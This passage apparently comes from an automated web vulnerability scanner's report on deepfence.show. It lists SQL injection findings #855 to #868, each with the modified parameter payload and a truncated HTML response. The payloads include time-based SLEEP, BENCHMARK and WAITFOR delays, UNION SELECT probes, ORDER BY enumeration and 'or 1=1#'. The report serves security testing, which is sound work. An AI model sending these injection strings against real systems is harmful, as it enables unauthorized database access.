src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #855Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #856\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #857\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #858\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #859\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #860\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #861\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io benchmark(50000000,MD5(1))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #862\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #863\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor pg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #864\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),3,4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #865\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #866Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #867\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #868\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ');waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- 